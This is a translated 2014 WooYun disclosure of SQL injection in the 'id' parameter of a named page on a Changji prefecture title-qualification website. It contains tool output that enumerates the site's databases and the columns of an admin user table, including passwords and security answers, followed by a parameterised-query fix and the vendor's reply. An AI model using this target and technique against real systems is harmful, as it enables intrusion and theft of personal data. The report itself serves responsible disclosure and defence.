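Vulnerability Summary

Bug ID: wooyun-2014-063811

Title: SQL injection in the Changji Prefecture Professional and Technical Title Qualification Application System

Vendor: Changji Talent Network (昌吉人才网)

Author: RedFree

Submitted: 2014-06-14 15:23

Fixed: 2014-07-29 15:24

Publicly disclosed: 2014-07-29 15:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 5

Status: Handed over to a third-party partner organization (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]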


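Vulnerability Details

Disclosure status:

2014-06-14: Details reported to the vendor; awaiting vendor action
2014-06-19: Vendor confirmed; details disclosed to the vendor only
2014-06-29: Details disclosed to core white hats and experts in related fields
2014-07-09: Details disclosed to regular white hats
2014-07-19: Details disclosed to intern white hats
2014-07-29: Details disclosed to the public

Brief description:

Insufficient filtering of a parameter on the public-notice information page of the Changji Prefecture Professional and Technical Title Qualification Application System leads to SQL injection.

Detailed description:

In http://zc.cjrc.com.cn/modules/universe/ArticleDetail.aspx?id=13, the "id" parameter is insufficiently filtered, resulting in SQL injection.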

web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
[21:00:53] [INFO] fetching database names
[21:00:53] [WARNING] reflective value(s) found and filtering out
[21:00:53] [INFO] the SQL query used returns 8 entries
[21:00:53] [INFO] retrieved: "humanresources"
[21:00:54] [INFO] retrieved: "master"
[21:00:54] [INFO] retrieved: "model"
[21:00:54] [INFO] retrieved: "msdb"
[21:00:55] [INFO] retrieved: "ReportServer"
[21:00:55] [INFO] retrieved: "ReportServerTempDB"
[21:00:56] [INFO] retrieved: "talents"
[21:00:56] [INFO] retrieved: "tempdb"
available databases [8]:
[*] humanresources
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] talents
[*] tempdb


Database: humanresources
[98 tables]

Proof of vulnerability:

Database: humanresources
Table: ManageUser
[26 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| Answer | nvarchar |
| Authflag | int |
| Authstr | nvarchar |
| Authtime | nchar |
| CountyID | nchar |
| Email | nvarchar |
| GroupExpiryDate | nchar |
| ID | decimal |
| IsOnline | int |
| LateIP | nvarchar |
| LateTime | nvarchar |
| LoginCount | int |
| Mobile | nvarchar |
| MsgNumNew | int |
| MsgSound | int |
| Password | nvarchar |
| Phone | nvarchar |
| Question | nvarchar |
| RegDate | nvarchar |
| RegIp | nvarchar |
| State | int |
| TemplateID | decimal |
| TrueName | nvarchar |
| UnitID | decimal |
| UserGroupID | decimal |
| UserName | nvarchar |
+-----------------+----------+


Database: humanresources
Table: ManageUser
[22 entries]

Remediation:

Strictly filter the parameter
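
The remediation above, sketched for an ASP.NET page such as ArticleDetail.aspx as an added example (not code from the report or from the affected system): the "id" value is validated as a positive integer and then bound as a typed parameter instead of being concatenated into the SQL text. The class and method names, the Title and Body columns, and the integer type of the key are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public static class ArticleLookup
{
    // Weak pattern, shown for contrast only: the query-string value becomes SQL text.
    //   string sql = "SELECT Title, Body FROM Article WHERE ID = " + Request.QueryString["id"];

    // Accepts only 1 to 9 ASCII digits. int.TryParse alone would also accept
    // surrounding whitespace and a leading sign, so the characters are checked first.
    public static bool TryParseArticleId(string raw, out int id)
    {
        id = 0;
        if (string.IsNullOrEmpty(raw) || raw.Length > 9) return false;
        foreach (char c in raw)
        {
            if (c < '0' || c > '9') return false;
        }
        return int.TryParse(raw, out id) && id > 0;
    }

    // rawId is the untrusted query-string value; it never reaches the SQL text.
    public static DataTable GetArticle(string connectionString, string rawId)
    {
        int id;
        if (!TryParseArticleId(rawId, out id))
            throw new ArgumentException("id must be a positive integer");

        // Hypothetical column names; the statement text is a constant.
        const string sql = "SELECT Title, Body FROM Article WHERE ID = @id";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Typed parameter: the value is sent as data, separate from the statement.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(table); // opens and closes the connection itself
            }
            return table;
        }
    }
}
```

The page handler would call GetArticle with the raw query-string value and return an error page on ArgumentException rather than echoing the input or the database error.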

Copyright notice: when reposting, please credit the source RedFree@乌云


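Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2014-06-19 14:22

Vendor reply:

Notified; handling in progress

Latest status:

None yet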